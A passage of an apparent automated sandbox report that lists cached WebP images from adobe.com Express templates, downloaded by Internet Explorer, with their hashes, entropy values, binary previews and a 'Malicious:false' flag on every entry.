                                                                                                                                                                                                                                                        Preview: RIFF*+..WEBPVP8 .+..P....*,...>u6.H....$......en.M......W....N..`^....v...._....._......|.E..:h}E=.?@=h..~.|/...........e.>...I....>g.w....l.........>.~_.W....d...e...W.....>@...A...W...u.S......6.I........?w=....'....?`............_........o...../._.....E.u.....O....s=.~w......._ .........}........u....Q4:{....z.<qt5...0nz ....... k4...x./....HN..?..b.T.2`q.-....I....[....J..V....:.lSi..J......W.f......[..%,..+.ZE.'..?e..;d.....h(..;zp:. .o..l'h..Y.C....).,_Ich.aK....g]vAhK....(...S?.....O#eV.r2{.....ox..*oj?...^*.76ss.w..F...r._F~..A..Z..}....6wG.x..c.N.%....c.,)..K.w..5....7..s....'..c<.........F?..P;..9.."8...v..^...Z.....?..(z.Z....&..Y].....^.....+9.D.8.xm.nt..../0...."OW.{.Y.V2...~yT...V..Cn.i+.K.l.g.K+;.P..H.j}.>....K.]_.Eb..K...S....3....h.z^.ht..1._@... ...}.g.."....e'4X....^]`........a...M.w..7|.f....&...-.H^..y.p..`..$.`xc...;...|:.k..V.9..y..;.9f.P...e..E......P........Is.c..+...q..k.x.g.%L...$..p.`.m.610..a."...J.yc..q.Z.5.e9....5,.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_16f1a991f9573c3356d30b94d7227685fea050849[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8758
                                                                                                                                                                                                                                                        Entropy (8bit):7.97763285460028
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:YcWlet2FON3po4wzv1qRVQSCnrhCKXwu50ZXMVAgVF:YcWc2Y3pxIwRpKXd5ScVLVF
                                                                                                                                                                                                                                                        MD5:C3B92ECE40CE0B9D6DAF610696757073
                                                                                                                                                                                                                                                        SHA1:295F7A21D0293D2757BAFC10CF2A5C26CF93E23C
                                                                                                                                                                                                                                                        SHA-256:4C50CE9761C419B9BB85554194F6D3EEE9A8547211B5CC7D0DA23BA3A88BB982
                                                                                                                                                                                                                                                        SHA-512:8A477844034F18643A29F2974CCD1B639E9EF269A812136ADFB35C98D7A929F89376FD80479D6E7E35ED076756F9F2F9EA399978AAD72D50908FA940530378EE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_16f1a991f9573c3356d30b94d7227685fea050849.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF."..WEBPVP8 "".......*,...>u6.H...!#S[...en.|....s........w.....?......3....._..........%./...J.i....[..{A........~g.......e1..?..../..._.~h.....O.?......E.......c.../..B...3.......~g.{...o........~.......~F.R.1.!..........J_....9...s./...?....2.....?.G..r.....e....&.bG\..iV.}.]..oa.LJ.1..9Kis....[K.....iI1.M...s....V..v.|V....y..jY.[h%I.4....M.....M./../.G..^...%.c..oJ{.8...h'.$.....&G...QJ".....!....k.@."..:...f..X...4._.|.3.....6[....W.)%........c.;.p.{.].d..6..i..E..zOp.!.SY..k.T....\.].I.7@.C..:[........... .....+.=.(......Qey..2.L....,...P..6U.....r.g..K..:.X........&.0.n).y.....D.9a@.)..C:.m......OB.I.'..."..e..z...`yK..[.W5...#..q9.r..%....%.9>4.........[.q...SI..=~{y...e.t.{.......D.VS.X...)z.z.\..n..|.....Z.GT....M[.....97N...F.....B..S..?. ..>..Fb?nL...].x...k..|..}.+.w.1.4..:.(O.\Mmt.........(.>\..P.H.c]2.!.%..zQ(..34.....p...%.u.....& ....@.2[......^%.D.......1....v.T.._.=%.K..m.W...0.._|.M]...{.Y....._...8.%.M.>
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_17b19aefd6de384e08f0b96a3e7a8ffccbb65a8fa[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9472
                                                                                                                                                                                                                                                        Entropy (8bit):7.976652429621942
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:kzMBSzdgfyPwbn6LxBQJ31X+N4nFoXwCf06K5DXyUGxlubR2SAcHk:ZTfy2nOB2Z+6F1QmDXpGxlubRVAcE
                                                                                                                                                                                                                                                        MD5:33FA43C97764B0D54C4DEF9864E5BFB6
                                                                                                                                                                                                                                                        SHA1:BC843FF6369E7EB975F7F9FAC59E91C6B5C21F96
                                                                                                                                                                                                                                                        SHA-256:C8E6B47FFA136FD71E6DA8A4289BDEC6C1AB311C41D59A5B74A74868352F2BFF
                                                                                                                                                                                                                                                        SHA-512:2602B1D1F0A123505AE2BF9F76525968088EE50B101580B7FD9E0AC63AB1CBEBA5E012F8FAECABAD5BEDAB1CF771BE70F8E63E2DF03D81A72744B9827F0747C9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_17b19aefd6de384e08f0b96a3e7a8ffccbb65a8fa.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.$..WEBPVP8 .$.......*,...>u:.I$.."#......gn.J..mK.r.&%8....\...;..v.......%......v.........4........H...S..o.Q..............._.........Y._...........I..........O.._`..?....k................w....L...../...7.o.....|..3...G.W...O..p......-....".t....{.....qk.:.s..g..+...C...&..mQ.. .....D.x.x.5....f3}..h.B..=q.B&&...l...^B........).soD$...........K.N0/..........~.1j.)6.$'.U....i......w.=......9W..Yq".x.d..#.6....ek}.T.)-B...p./..Z..l.e .....K..g*.z...D,h.0. ....Z.c.o....X+N...........a ...K..8o..".x.p.+....N.SWI...Ef...+.2.g.X..Z......YB.2l.;.. .$.;F..%,....;'...C.+DN..~....)Q....<+.U&....T...X..n..._T.c..E......%.".......aq..$]|......F......;.......Dvi~uQ.../.m..S...I\;.........^.....Y.,.n..1.n,W.ekE.vY.%....t...Z....4y..k..S...K.M.`......>..tfMca......#.,.[.[..7Ff..5.\.]..Zl<+..........;.X$|..*.N..5...tbw..i.........J...Q....5.uC...w..e[u...].....5s..../o.........].IW......l\.,P..d?...t....OY.d#..M}.,.t.u.....Q.|u....9.>^..[G(
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1872c471a06e7263236115878a9cc98a727e23c64[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10466
                                                                                                                                                                                                                                                        Entropy (8bit):7.978656685235785
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:T65YiY+XAt+LMsRap/Tq4FLVi8i63/PMENGsiz6phqWm+DY/9/y46sRw:+5NpMuap/GMBvxvPvNBM6fque0FsRw
                                                                                                                                                                                                                                                        MD5:24B7FEDEB99A35D6DCA481EB7CB94DD0
                                                                                                                                                                                                                                                        SHA1:2E381ACB696B98888BBF1226533D11455F9FE217
                                                                                                                                                                                                                                                        SHA-256:0CD5070EF9B6724CBBC0A3E189BCD8DD7F948B9CC983DF10F5B71CFB02774AAF
                                                                                                                                                                                                                                                        SHA-512:03D09EAD50CC70E239BDD66D67925920B69FE660041103E496578E94CF7F563D7C96CBC3692BA953B1D345ECE5663C74B1AF8DAA04EB69F4F191E6A0D8303493
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1872c471a06e7263236115878a9cc98a727e23c64.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.(..WEBPVP8 .(.......*..k.>u8.H$...%.{....in.Wx.r.a.$.}.._.oE~.~G....K...G.9.....S~..+..............o...........)._.z.....5.....g.?....../...g......V./...W...O..?....}....?....d.9.........{..?..]=.rkJ.....#..J...B-...s.y.n...3..b.m}...A.a/.2...n..q..z....?."....1U/....Qq.N98.....)c...y.b..T.G..`~...l.|+C...e..l.../..W.....1|Ts.i6.o"......B.%r.i....].A.20`_..wX..K..#...O..u}...Q.G..f.2..$....w........rm\..<. ..$9[.%bt.....)+......B....f0...O/.US.#..m...gNR....S....&.G.E.4?O.{.m..X._8......4.2..'.G...5.;.O)vj...q...D.!g.Tu...*.@Ao6.....dX....!g..o.]...t.d..t..u.~..-.g.V-.Y.J4..f^....b....13+e..@?^JT..NW..msdz....lF...?.....L+.u3...p....k'..eVl.j..f.-.HK.......t...H....q..y....\[.p.....zNFc..t.|..,.4..8x..'*.gh.M.f.&..[......h.{qhj......+.."V........JP.>W..o....;....`Bx.Ae.+..t..G....b....tB]G.L.Aw!....G...J.Jh.d.......(j.J.QX......\q........g+....K.....1...R.{e....&....2..*xx_+V:o.l.i%O..2+.../..nu/(`(..VNx.y}..P..u.........\.b.`..|\.Mfp..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_19655c70ca20534db7d4a5a7915326d7634b99b39[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9330
                                                                                                                                                                                                                                                        Entropy (8bit):7.978349615626282
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ESQmRChCd96SBg4ybCukoiVK/VhKx+y6e2ad535Cl2m54iiguubbVcpBm:hLRChQB9oISm+tOdjKpUuFcps
                                                                                                                                                                                                                                                        MD5:692CCB0935294C0A0FBD34893BB73DD0
                                                                                                                                                                                                                                                        SHA1:A1DBBA2803E2CEF959B5841588E35AAD8FF3273D
                                                                                                                                                                                                                                                        SHA-256:2E1C4BDF5711D8150F780DAB0BA5C418744D459FDA04F78A66BACDAB8CD56847
                                                                                                                                                                                                                                                        SHA-512:848D3BC0FDEAC7EA6D0160AB63EB921ADF11A6A434B4C54E66B7872D5599E49934AF80F26FF53E11305328D610429B47BBC9EC7B32F2C226D2B493AB2C028320
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_19655c70ca20534db7d4a5a7915326d7634b99b39.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFj$..WEBPVP8 ^$.......*,...>u6.I$...$S.....gn.s..".Y.j...~..S.z$.......O._.....=(.U.s...`=k..{A.t...u.g.....d..........^....>a.....g.c......."........?.z.|...sn.......`/T...g.......=H...../..................................?.~..+.!.......Oh.......{.#.....?l....?s........".3....6.Y......p..j.j.Vq.y.vF....\{q5...(g.'.W.Wdm."Y&W..p'...p2..m.....kh.K.. ..m..3|@._......G!.Vq.y.A.q.g-.@...l.$*U..j.r|... ...2..>.jQL..p....\+8..x.~.....(....`.&......#...[N...sbS1.v>.....t.q.......Fv.a...t `.=....;.......r.._..p...#o2.x.q]............~......9.t...A.....@.NcS/.L?...T\...!...1..<3i.C........B=@.e.0f..2.J...L^Z"M '.m.p....|=]..e.LH..e.ck.M..=AQ..w.h.L.&.#...{..{<.7.1.nq}n...!....Ahy|`..K.F^...;"..mR......W\]..-.%.M..J/..~U........s..A.U-.%l..g..R.~{..O..eGYY..~...Q..k....+<......g.V...b.A..i.K._@..,S..&0..').r..."W...&8...1..k....d7.-.".T....t./...y.|.z...`....sO..f/).R.6..|.h.._..t...1.x0...w.....a~......K...[... ....Pg....)..J..d[?..k..B=E..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_19690ef1d10ce326d9fd8530393422c4d2fde5ddb[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13084
                                                                                                                                                                                                                                                        Entropy (8bit):7.984908618263826
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:0loBbvbrNvBjhqfV7qgMY+XN/xVjGAFY5wH3yISf6cpRv3RAqKv/qQ1n:Qw3r55IgX9XFjl+wUvRv3RAqKaa
                                                                                                                                                                                                                                                        MD5:D036490BC6D67BCFB1748B56F7EDD7B4
                                                                                                                                                                                                                                                        SHA1:805322184A82F7A6356E19816DA53F78B26C83FC
                                                                                                                                                                                                                                                        SHA-256:8F5CEF1B4ACDB38AB1F51ACF7E66B8922A0EFF54EE7B9614268629EF2214499E
                                                                                                                                                                                                                                                        SHA-512:04C7E36C11F3D1C73E23F65C6A767DE3A20AD5AE462344BC814E00125BDA3D282D20F995CC83A0B92369127B890F71D825123E501AFD59509F490E952D51FB83
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_19690ef1d10ce326d9fd8530393422c4d2fde5ddb.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.3..WEBPVP8 .3..P....*..k.>u4.H$..!&U,X...gn.l.`.?..4..R.d..Kq8...../>j.o.....g....K/0......{.z....o.....'....`.-.......s...\...#..j...~..q............_....'...o..v.C...k................).A..._.......vA....z.{..o._...~..>.o.7..........O.c.....?y..~.y&}+..._...?.?......_..........6.....S.w.... ..?....%....'./..u../....~..1...q.o.C.)U....D..g.~.[...C...y. p..%`.9P@L.mp.G;.[`...C..,...r.).'=Y.....S.....)..[^-.*.......*.7.@e.m........9.I....L..q>.9J...8......PkQ.>.mR...;gh%...1qe..K4...l..._...?+.w9...l...3Z...c`..j.G!.T..F...........m.aV......V.P.&....b.........f.D.&\`.b.7..RK/..>#....}`:<M.........I.Z..)....\...,I.V.j...af~....k7.!...].^.V...M....4H>..IM}...z..\.O.P..<(....y..'..L....#iT...-./.;.RM..4..Nd.....A.I...K....J......ws.....3..Ps..3^>..s...H.u..oC...K3.I"WC...IB......'..`....m.k ........?.`)+.:l. .6.".o...7U6>34.dC..u......z.DxB..<..P.{..+f...B.......~x.%p.oV*..p.,.}......|7{.^...1........h..N....P.e......59..`.....E....e...#..(..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1b789978976aaa068321eb8d193edca9c6d7df091[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6916
                                                                                                                                                                                                                                                        Entropy (8bit):7.970505864307654
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:jY+v60KbubPugHLhqcrjsi5mTs8qp7IeC:jY4dPqcvnkshp7IeC
                                                                                                                                                                                                                                                        MD5:159346B993007B26CFB5C365CBFC890B
                                                                                                                                                                                                                                                        SHA1:0BD84CDDB0E7B8265E0FD2A6F6CCD08BCC758F14
                                                                                                                                                                                                                                                        SHA-256:6925260FF59BFFD1F789229D6CC10F7FC5105EDB17EDD577EEE3C9D3099E5DD5
                                                                                                                                                                                                                                                        SHA-512:6188D2C94DADE040981908C9562EF2D665A3A8940DAD464791BC6A8204FE548F9887BF309C4CE0BFBBEBFE8B73D2719B5C2B6C6464CAC721261D20E7FF513EF3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1b789978976aaa068321eb8d193edca9c6d7df091.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....0o...*..k.>u8.I$."!#4J(...gn.r...B&4;.......?......}.<..n...k.i..ugz7.....|@z..^.....l.....'.O.~................/d.....;...3..._.....).....w.......}w.w.o...........G....O...0=.}Y...W.O.....op..?...|1........`.etH/..h.],..x.z.z..n.B.... .RSs.*..xY..i.v$...k..|ye.E{.)I.Y...w.s..P.(...6o.60...U.V._b?P.S...O]2bZ!.m~. 0.....6....F.Pf.Y'..v..XV8..>.A.|.^....k.c.jt.Y..5f&DZT.?.i{........)do....N..Qh.Jw.[*...k.....EQ..:Hm#..N...(...Z.+.t1_...B.,%.......xg&JsU..-....7X.7..6....X ._..5.k<......T..,d...)C...jf+...Z.[q..I4).q}.....M)..tK#.*V[.:7P.Arfw...b%.~#.iZ7.[.S..,.*..UA_/...'.XW......]V.c...-.=.dcb..Iy..!....O.=F;.....l7Y..`B...{[/..Z...........w..{z..m&.....]^.}).:.J3...D.(.:V+...3....y....a.*..H....C.Mo.^....&G..<f...Fe....S.B....B..yX.0...>.....p.;Wb8p.!......`...?..G..~RF.SK.%.).e......6..H.R.o.N.>...nRe!O[|..#n.,`..Oc...P.n..DnV.!O.P{......,6.........d.W..E...Cf.x...B....`k y...........j-....j-.~~......_...]...oMo
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1bf2152fa9f22385f1f6b2335e89950c4f41189c7[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):12736
                                                                                                                                                                                                                                                        Entropy (8bit):7.982120393972581
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:I0+FIHd8MKT3jdvqVUgf7hVWa3vUdqA2q2MLniCRlLrTpZN8nhum8k8G8Y3RkG87:0FkuZvqVlVDjA9ayTQUm3RyMV0k+lmcH
                                                                                                                                                                                                                                                        MD5:0049CAEF95B2B0EC332613F5862A6596
                                                                                                                                                                                                                                                        SHA1:B64A76B254374172D8211F1A04B26C37A5249E41
                                                                                                                                                                                                                                                        SHA-256:5DE43088D29BA089716960F634C8B6DE641A52650EF0D40B636E6E91525F6687
                                                                                                                                                                                                                                                        SHA-512:B9084B4A96FDA9C3FF9F1BF58B12F4F7081600C3E0D678CF0916D950DD2DF7A3CFA9E8268476F2CD578DE2D7625AAD0DE0B9A96DE9CE589E6FBA0C025063ABE6
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1bf2152fa9f22385f1f6b2335e89950c4f41189c7.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.1..WEBPVP8 .1.......*,...>u2.H$..!'..8...cn.rR..w...._.;Pd.Jf...j...'.{S....s........P...X..w=D~........a...../....c/......~.z....b.'...{..........[.7..n~....W...}.r....1.......?t.....W.........../.O..M.+...^...}......^......O.......?.?.z.._.....?................?..f~.?......G.......?.........t.....3.....^...C.,.......g....c.u.....h..p...YHr......a....o.a....K9....*u....v+q.x.+I.....5.u.)b.%......q..e2./....B......+.a.4*A6..v...f....h....h.....jr...:...K..,n.o))..V.jr^...K......a."...S.k....Fk..o9T2..-p.E.$......{.j+...P`M..a,....... ,......l'O..Xq.p9.b.Y..i?.NZ_..I...(Y..........9'K...+h.!.*.!0aqb...W.db..'Yn"....|..WfhcU.......h...7.W....vb.)..........`..1CD.'34L...i:2.iR/{rq0...... .#=.....R#..?.@.w.Q.V...I..<7a.q.j......"q.4.x.}..6T?.... ......:.b..|:?....v...5.b.v..Q.j../......p=.....}....o./K..P......._...AM..0..".ZO.z=c.^.sk@..(CR.Sq.....J.di.C.?=...5.D.....:.vot....%......(HI....W.O.@..b..@bH.....e...%...m.1-6.Z#.jm......2
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1c08d5249661d979ecbd6ba98a8f1d111a0b3624d[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8376
                                                                                                                                                                                                                                                        Entropy (8bit):7.634314056264143
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:QnpEzwQFf4MidB93sn75R/rdhueKTI2GzSy5P2s2:Tz7d4f98nFvh75P2s
                                                                                                                                                                                                                                                        MD5:418BB39EF0EFA3E54A230212A06808DD
                                                                                                                                                                                                                                                        SHA1:B5326D8CC9C4ADED399B66E8AD52A99DC96E50DB
                                                                                                                                                                                                                                                        SHA-256:243060CF7F959D686C13E16EEDEF3460C84C36B44633C35472903CFB136441AB
                                                                                                                                                                                                                                                        SHA-512:9533C4E00F2E2487A2A71435D538AB6D73BB8DF51B07D2EAC4D2DDE3F3733C35A6BFBB6A9DF3E13B45D12DDDB986C6E4AF3FFD8E8721F085FE4F6BF586BCBD15
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_1c08d5249661d979ecbd6ba98a8f1d111a0b3624d.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF. ..WEBPVP8 . ..0^...*....>u:.J$.&!..X8...in.e.7k....h|3...}5.....]Y....;...X_.}A...b......./.....;.._........}T<.d..d.|..../...........a.3........../.W.~....:.g._].^.u&.z..nQ...0.....!.w./.=...z*..@. .b..,X.b..,X.b..,X.b...b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b..,X.b.........:..r...\.r...\.r...\.r...U.mD..M.L.>.qY7.(."....YM.m.... @..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1c2c6d02cc6b297a9177eaac4e9606440e8dc4d26[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10088
                                                                                                                                                                                                                                                        Entropy (8bit):7.978655876273718
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:QKGBAqKohqw6MVugjOu7ry8RgUnqATGQjDnPDVS3iLuIQBA2uXalkmoomsZB3tuW:Cb3qwFsuOu7ry8zq16SSLu3ufkmAtuO
                                                                                                                                                                                                                                                        MD5:7A344806E65012BE84A75EDC171109AC
                                                                                                                                                                                                                                                        SHA1:1342B1714ADD537917D160324DE80C496A1F27F5
                                                                                                                                                                                                                                                        SHA-256:805193A212C578C782B70263283ADD607EA14B225BB23B85387B2F59B2C49A9C
                                                                                                                                                                                                                                                        SHA-512:087BD8E62A8EAF45D71466308AB12A875CE0C4AE22FB7A2B18CCACD4830EAD9F27BD0C1D92D8D898FFA2D0716E371944762559C467F61A6571E370AE71D6C5C4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1c2c6d02cc6b297a9177eaac4e9606440e8dc4d26.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF`'..WEBPVP8 T'......*,...>u8.H.."!%..P...gn.c..ofAssO..v...<p......0.w_...~.~...z..........7..`.@...M.c..?..r..?..Dys./l?.3...m...9.i....O.G...}.........?.z.~S......#?...{./......G.......}....'.....?....6......./........+.......O.?.?j>..........O.?......i.../._...~.?o.....e....M.Se....H.c..1.....Lt..........Jp..T..{7...Y.H*.....=U?.!..{..*...,..=f?....UJ...a.z.i...:...Rv$..gP.o..t`#.9...[......cM..p&.*.f..Eog<(.*..O*...D.S..9..4.H.sKX...:..l...$2..sB36.3.xzeZ.....#...'2.....9,..i.cS......"..*e..5)....c(.I..G.. ..2.o....kdf..,..}y.Z.pS@...!....z......q.&.9....R....P..Niy.rx..YB.H#..a.qcb.U........o.8WV...U..n)...v..b.h..V`g.b....qR,.*.G...p...7|._Pi-.w.Ij._C7.45.5..d...\.E.f^5...........0...5..e...*Bt..i.y.).(S...{Za../W...3qY.w#..n.....qVJHF..u...z..6_..DY.4H..(wm..3......J..}d...;..D\*;.....~...K<..I..].+U...b=..r.%..v..pQ.nl.....U...j...L..S. )....H.c.|"y....z....m...A..o..Ks_a1=..+...]..''u...H.G.<....a....2.<.....\.....:..KXu<..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1e440d4fb87a5de1b4b6ff51b1ae37a2f63c40817[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):6918
                                                                                                                                                                                                                                                        Entropy (8bit):7.965893688722397
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:e3kbQR0EMN6e1kZc9USUPzFQ9rR5OIMElmLoJvD:SSQfMN62SU1UEjOIMEU4vD
                                                                                                                                                                                                                                                        MD5:D7DC11770DECBFB1E45B3EC05827E4C3
                                                                                                                                                                                                                                                        SHA1:26D620C35237CB9FC1A8673DB04CEC7A233FECC5
                                                                                                                                                                                                                                                        SHA-256:2099419132AE52EA9AC501D2AFA724D23040657132D71B41859DE5F159A333D3
                                                                                                                                                                                                                                                        SHA-512:B6048EE14D79432043EB4A42DD354F5C597E7C7DC9A8186BEC6F896356DB83EDDC59C346A519DCF6BA9675F8B01AA95AC5C1379AD9FCE3072E77871F7283B079
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1e440d4fb87a5de1b4b6ff51b1ae37a2f63c40817.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....0t...*..k.>u8.I$."!#.Jh...in.q1.....l...&...U..n...G....3..._._...........=.?(.........;x.........}+......L.................?..o.v.....?.....K.....W..._..$?....h.s._./......x.......q....F;..i.._....W8.{.g?..b+..uup.....b.....c....$..w......./....eD.7..$.x`yA..i....K.-.3.t..D..k..(.3~...;..;Br.S.......>....&#F.EW0(.h.K1sN..5.....!~@..*...4....2].y..:..`.....^.D.......4.0...K.0..N84..w....Nh.5..d.qL..r...o{...*...#F#Y.Fi.DY.@o..........u.-QYq..n...}.q......t.J.'Z8l...?`Q........D..^..I....(V.u.-V...|..jvH.+i....._...V...bm.....~..Y.57........Q.........<..7....$... ..3..Q.+.}n..k.R.3..]..p.TzN.!..y6.g...d......L.......Y.+..Z'ElrA:4F..l}.\..>........j.a.u...#7............(+.5d.#..$...;K....3.rq.....K.2.U.f.%e@3.......0......Pa..k.$..-...$.qF3.m..b3=.8...x...$....t[x/r...G.b..0.]..L.w.... .{09.k..'.........X >3..Tb...G............"....#.d..$...+"2c...7W7..[.b+..us~...... .uu..WL6.........A.....H8.\.........T.......k...<B...|.N.~p|W.2......t.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1ead54a0ff6dcb617f31ace7cbdc8d1154dfbcaaa[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15596
                                                                                                                                                                                                                                                        Entropy (8bit):7.924853591926377
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:aJOj5kq7OIgC0cO1UvnnK77yyqW8fcnrH/p0D:zZ70fqvnK77wd0nDp0
                                                                                                                                                                                                                                                        MD5:D20DFF1B37116952CFC7737C12290261
                                                                                                                                                                                                                                                        SHA1:E0BEA1AE67345538B7C0976D6F688ABDD2CF3044
